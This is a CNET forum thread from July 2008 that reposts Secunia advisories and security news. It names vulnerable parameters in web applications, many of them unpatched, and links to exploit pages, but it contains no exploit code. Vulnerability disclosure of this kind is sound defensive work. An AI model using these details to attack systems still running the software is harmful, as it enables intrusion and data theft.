Spyware, Viruses, & Security forum

General discussion

VULNERABILITIES \ FIXES - July 28, 2008

Web Wiz Forum Multiple Vulnerabilities

Secunia Advisory: SA31281
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote

Solution Status: Unpatched


Software: Web Wiz Forums 9.x

Description:
CSDT has reported some vulnerabilities in Web Wiz Forum, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks.

Solution:
Filter malicious characters and character sequences using a web proxy.

Do not browse untrusted websites or follow untrusted links while logged on to the application.

Provided and/or discovered by:
CSDT

Original Advisory:
http://depo2.nm.ru/WebWiz_Forum_v9.5_CSRF.txt
http://depo2.nm.ru/WebWiz_Forum_v9.5_XSS.txt
http://depo2.nm.ru/WebWiz_Forum_v9.5_XSS2.txt

Discussion is locked
You are posting a reply to: VULNERABILITIES \ FIXES - July 28, 2008
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: VULNERABILITIES \ FIXES - July 28, 2008
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
Avaya CMS Sun Java JDK / JRE Same Origin Policy Bypass

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31269
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Security Bypass

Where: From remote

Solution Status: Unpatched


OS: Avaya Call Management System (CMS)

Description:
Avaya has acknowledged a vulnerability in Avaya CMS, which can be exploited by malicious people to bypass certain security restrictions.

Solution:
The vendor recommends that local and network access to the affected systems be restricted until an update is available.

Original Advisory:
http://support.avaya.com/elmodocs2/security/ASA-2008-308.htm

Other References:
SA31010:
http://secunia.com/advisories/31010/

Collapse -
Debian update for ruby1.9

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31256
Release Date: 2008-07-28


Critical:
Highly critical
Impact: DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for ruby1.9. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
http://www.debian.org/security/2008/dsa-1618

Other References:
SA29794:
http://secunia.com/advisories/29794/

SA30924:
http://secunia.com/advisories/30924/

Collapse -
Debian update for python2.5

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31255
Release Date: 2008-07-28


Critical:
Less critical
Impact: Exposure of sensitive information
DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for python2.5. This fixes some security issues, which can potentially be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or to compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
http://lists.debian.org/debian-security-announce/2008/msg00205.html

Other References:
SA25190:
http://secunia.com/advisories/25190/

SA26837:
http://secunia.com/advisories/26837/

Collapse -
Debian update for python-dns

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31254
Release Date: 2008-07-28


Critical:
Less critical
Impact: Spoofing

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0

Description:
Debian has issued an update for python-dns. This fixes a vulnerability, which can be exploited by malicious people to poison the DNS cache.

A vulnerability is caused due to python-dns not sufficiently randomising the DNS transaction ID and the source port number, which can be exploited to poison the DNS cache.

Solution:
Apply updated packages.

Original Advisory:
http://lists.debian.org/debian-security-announce/2008/msg00204.html

Collapse -
Debian update for icedove

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31253
Release Date: 2008-07-28


Critical:
Highly critical
Impact: Security Bypass
Spoofing
Exposure of sensitive information
DoS
System access

Where: From remote

Solution Status: Vendor Patch


OS: Debian GNU/Linux 4.0
Debian GNU/Linux unstable alias sid

Description:
Debian has issued an update for icedove. This fixes some vulnerabilities, which can be exploited by malicious people to conduct spoofing attacks, bypass certain security restrictions, disclose sensitive information, or potentially compromise a user's system.

Solution:
Apply updated packages.

Original Advisory:
http://www.debian.org/security/2008/dsa-1621

Other References:
SA29133:
http://secunia.com/advisories/29133/

SA30761:
http://secunia.com/advisories/30761/

SA30911:
http://secunia.com/advisories/30911/

Collapse -
reSIProcate Unspecified Memory Consumption Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31251
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: DoS

Where: From remote

Solution Status: Vendor Patch


Software: reSIProcate 1.x



Description:
Some vulnerabilities have been reported in reSIProcate, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerabilities are caused due to unspecified errors within the stack and can be exploited to cause the stack to run out of memory.

The vulnerabilities affect versions prior to 1.3.4.

Solution:
Update to version 1.3.4.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.resiprocate.org/ReSIProcate_1.3.4_Release

Collapse -
fipsCMS light "r" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31250
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: fipsCMS light 2.x

Description:
U238 has reported a vulnerability in fipsCMS light, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "r" parameter in home/index.asp is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 2.1. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
U238

Original Advisory:
http://milw0rm.com/exploits/6135

Collapse -
IceBB "username" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31248
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Vendor Patch


Software: IceBB 1.x

Description:
girex has reported a vulnerability in IceBB, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "username" parameter in modules/members.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 1.0-rc9.2. Prior versions may also be affected.

Solution:
Update to version 1.0-rc9.3.

Provided and/or discovered by:
girex

Original Advisory:
IceBB:
http://forums.xaos-ia.com/?topic=760

http://milw0rm.com/exploits/6137

Collapse -
TriO "id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31244
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: TriO 2.x

Description:
dun has reported a vulnerability in TriO, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in browse.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is reported in version 2.1. Other versions may also be affected.

Solution:
Filter malicious characters and character sequences using a web proxy.

Provided and/or discovered by:
dun

Original Advisory:
http://www.milw0rm.com/exploits/6141

Collapse -
CMScout "bit" Local File Inclusion Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31243
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Exposure of system information
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: CMScout 2.x

Description:
R3d.W0rm has discovered a vulnerability in CMScout, which can be exploited by malicious people to disclose sensitive information.

Input passed to the "bit" parameter in common.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled, "register_globals" is enabled, and that the underlying web server does not respect ".htaccess" directives.

The vulnerability is confirmed in version 2.05. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
R3d.W0rm, IRCRASH

Original Advisory:
http://milw0rm.com/exploits/6142

Collapse -
GC Auction Platinum "cate_id" SQL Injection

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31241
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: GC Auction Platinum

Description:
Hussin X has reported a vulnerability in GC Auction Platinum, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cate_id" parameter in category.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation allows e.g. retrieval of administrator usernames and passwords.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Hussin X

Original Advisory:
http://milw0rm.com/exploits/6144

Collapse -
SiteAdmin "art" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31240
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data
Exposure of sensitive information

Where: From remote

Solution Status: Unpatched


Software: SiteAdmin

Description:
Cr@zy_King has reported a vulnerability in SiteAdmin, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "art" parameter in line2.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation allows e.g. retrieval of users' e-mail addresses and password hashes.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cr@zy_King

Original Advisory:
http://milw0rm.com/exploits/6145

Collapse -
Youtuber Clone "UID" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31238
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: Youtuber Clone

Description:
Hussin X has reported a vulnerability in Youtuber Clone, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "UID" parameter in ugroups.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Hussin X

Original Advisory:
http://milw0rm.com/exploits/6147

Collapse -
NetBSD update for bind

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31236
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Spoofing

Where: From remote

Solution Status: Vendor Patch


OS: NetBSD 3.1

Description:
NetBSD has issued an update for bind. This fixes a vulnerability, which can be exploited by malicious people to poison the DNS cache.

Solution:
Updated source packages are available (see vendor advisory for further details).

Original Advisory:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-009.txt.asc

Other References:
SA30973:
http://secunia.com/advisories/30973/

Collapse -
Camera Life "id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31234
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: Camera Life 2.x

Description:
nuclear has discovered a vulnerability in Camera Life, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in sitemap.xml.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is confirmed in version 2.6. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
nuclear

Original Advisory:
http://milw0rm.com/exploits/6132

Collapse -
XRMS CRM Information Disclosure and Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31233
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting
Exposure of system information

Where: From remote

Solution Status: Unpatched


Software: XRMS CRM 1.x

Description:
AzzCoder has discovered two vulnerabilities in XRMS CRM, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose sensitive information.

1) It is possible to view certain system information returned by the "phpinfo()" function by accessing the tests/info.php script directly.

2) Input passed to the "msg" parameter in login.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

NOTE: Other scripts are reportedly also affected.

The vulnerabilities are confirmed in version 1.99.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised. Restrict access to tests/info.php (e.g. with ".htaccess").

Provided and/or discovered by:
AzzCoder

Original Advisory:
http://milw0rm.com/exploits/6131

Collapse -
Trac Wiki Engine Cross-Site Scripting Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31231
Release Date: 2008-07-28


Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote

Solution Status: Vendor Patch


Software: Trac 0.x

Description:
A vulnerability has been reported in Trac, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input passed to certain parameters in the wiki engine is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability affects versions prior to 0.10.5.

Solution:
Update to version 0.10.5 or later.

Provided and/or discovered by:
The vendor credits Nathan Collin.

Original Advisory:
http://trac.edgewall.org/wiki/ChangeLog

Collapse -
cwRsync OpenSSL Denial of Service Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31228
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: DoS

Where: From remote

Solution Status: Vendor Patch


Software: cwRsync 2.x

Description:
Two vulnerabilities have been reported in cwRsync, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Update to version 2.1.4.
http://sourceforge.net/project/showfi...ackage_id=68081&release_id=615606

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sourceforge.net/project/shownotes.php?release_id=615606

Other References:
SA30405:
http://secunia.com/advisories/30405/

Collapse -
PunBB SMTP Command Injection and Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31219
Release Date: 2008-07-28


Critical:
Less critical
Impact: Security Bypass
Cross Site Scripting

Where: From remote

Solution Status: Vendor Patch


Software: PunBB 1.x

Description:
Some vulnerabilities have been reported in PunBB, which can be exploited by malicious people to bypass certain security restrictions or conduct cross-site scripting attacks.

The vulnerabilities affect versions prior to 1.2.19.

Solution:
Update to version 1.2.19.
http://punbb.informer.com/downloads.php

Provided and/or discovered by:
The vendor credits:
1) Dan Crowley
2) Stefan Esser

Original Advisory:
http://punbb.informer.com/forums/topic/19539/punbb-1219/

Collapse -
KbLance "cat_id" SQL Injection Vulnerability

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Secunia Advisory: SA31123
Release Date: 2008-07-28


Critical:
Moderately critical
Impact: Manipulation of data

Where: From remote

Solution Status: Unpatched


Software: KbLance

Description:
A vulnerability has been reported in KbLance, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cat_id" parameter in index.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
S.L TEAM

Original Advisory:
http://milw0rm.com/exploits/5883

Collapse -
DNS hole - no patch yet from Apple

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

28 July 2008

Unlike Microsoft and the Linux distributors, Apple, perhaps distracted by their recent spate of product launches, has so far not provided a patch for the current security problem in the Domain Name Service. As the vulnerability is already being exploited, anyone using an OS X server for DNS purposes should act immediately.

In early March, Dan Kaminsky discovered a massive security problem in the procedure used for translating names like www.heise.de into IP addresses like 193.99.144.85. It appeared that, with little effort, access to the service could be diverted to other computers on the internet. Kaminsky informed all the major vendors ? according to Rich Mogull, who says he assisted Kaminsky in making these contacts, these included Apple ? and the vendors agreed to face the imminent threat with a joint strategy.

More: http://www.heise-online.co.uk/security/DNS-hole-no-patch-yet-from-Apple--/news/111187

Collapse -
RealPlayer update fixes critical security holes

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

RealNetworks has provided updates for various versions of RealPlayer to fix critical security holes. The updates affect versions 10, 10.5 and 11 for Windows, Mac and Linux. Users are advised that installing the update is crucial. Among the problems solved is the vulnerability in the ActiveX module discovered four months ago and a buffer overflow which was rated as highly critical and can be exploited to inject and install malicious software, as advised by security provider, Secunia.

http://www.heise-online.co.uk/security/RealPlayer-update-fixes-critical-security-holes--/news/111188

Collapse -
RealPlayer Releases Update

In reply to: RealPlayer update fixes critical security holes

added July 28, 2008 at 07:52 am

RealNetworks has released an update to address multiple vulnerabilities in RealPlayer. These vulnerabilities may allow an attacker to execute arbitrary code or obtain sensitive information. RealNetworks identifies the vulnerabilities as the following:


RealPlayer ActiveX controls property heap memory corruption.
Local resource reference vulnerability in RealPlayer.
RealPlayer SWF file heap-based buffer overflow.
RealPlayer ActiveX import method buffer overflow.
US-CERT encourages users to review the RealNetworks advisory and apply the appropriate updates to help mitigate the risk.

http://www.us-cert.gov/current/current_activity.html#realplayer_releases_update

Collapse -
Apple's Safari browser vulnerable to session fixation attack

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Apple's Safari web browser, when handling cookies in multipart top level domains (TLDs), contains a vulnerability that potentially allows attackers to access the web services used by the victim. Safari handles multipart TLDs like .co.uk or .com.au differently from normal TLDs like .de or .com. According to a report, this allows attackers to inject the browser with a cookie which Safari will subsequently use for log-in authentication at other servers in the same TLD.

Before carrying out the attack, the attacker receives the cookie to be injected from the web service to be attacked, but created for his own account. As the victim effectively shares the attacker's session, the latter can then spy out the victim's connection. However, the success of this type of attack, called session fixation ? PDF file ? depends on the respective implementation of the web application. It is, for example, dependant on the IP address and other information being included in the session data. So far there isn't a patch for Safari. Internet Explorer, Firefox and Konqueror were also vulnerable to this type of attack, but the hole was closed in all these browsers, almost four years ago.

http://www.heise-online.co.uk/security/Apple-s-Safari-browser-vulnerable-to-session-fixation-attacks--/news/111189

Collapse -
Security shocker: 75% of US bank websites have flaws

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Insecure by design
By Dan Goodin in San Francisco

The vast majority of US bank websites jeopardize the security of their online customers by including design flaws that expose passwords and are susceptible to tampering by attackers, researchers say.

In a paper titled "Analyzing Web sites for user-visible security design flaws," researchers from the University of Michigan found 75 percent of bank sites surveyed had at least one such design flaw. The report was presented Friday at the Symposium on Usable Privacy and Security meeting at Carnegie Mellon University.

More: http://www.theregister.co.uk/2008/07/25/bank_sites_insecure/

Collapse -
Responding to the DNS vulnerability and attacks

In reply to: VULNERABILITIES \ FIXES - July 28, 2008

Posted by Nathan McFeters

July 28th, 2008

The DNS vulnerability, which has completely dominated the news in the security world the last two weeks, has been a concern for so many. On the front of good news and getting things protected, the IBM ISS has team has published some great information.

The Frequency X Blog, run by IBM ISS, had an interesting article that I think is likely useful to many of us out there. I?ve personally heard a few questions from my clients, some from other associates at Ernst & Young, asking about other options for mitigation, if this is being attacked in the wild, etc. Apparently IBM ISS has heard similar things. From their Frequency X Blog:

More: http://blogs.zdnet.com/security/?p=1573

Popular Forums

icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

SMART HOME

This one tip will help you sleep better tonight

A few seconds are all you need to get a better night's rest.